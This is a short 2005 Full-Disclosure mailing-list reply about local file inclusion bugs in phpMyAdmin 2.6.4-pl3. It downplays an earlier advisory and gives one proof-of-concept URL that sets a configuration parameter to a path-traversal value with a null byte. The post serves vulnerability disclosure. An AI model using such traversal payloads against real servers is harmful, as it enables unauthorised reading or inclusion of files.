[Full-disclosure] Re: Advisory 16/2005: phpMyAdmin Local File Inclusion Vulnerability (Stefan Esser)
Maksymilian Arciemowicz
max at jestsuper.pl
Sun Oct 23 19:00:37 BST 2005
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
It is low local file inclusion. No critical. Standart have you
$cfg['ThemePath'].
More critical bug still exists in phpmyadmin.
phpMyAdmin-2.6.4-pl3/libraries/database_interface.lib.php?cfg[Server]
[extension]=../../mGPC_muss_be_off_%00
org. adv.
http://securityreason.com/achievement_securityalert/1
Maksymilian Arciemowicz max at jestsuper.pl
SecurityReason.Com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)
iD8DBQFDW8673Ke13X/fTO4RAsbzAKCv8tkGfD5dAbliWlaLMkfLkYnVfgCgs9RE
HllDGmvD6iOQiSeH9Sk4WCQ=
=9U2v
-----END PGP SIGNATURE-----
Full-Disclosure is hosted and sponsored by Secunia.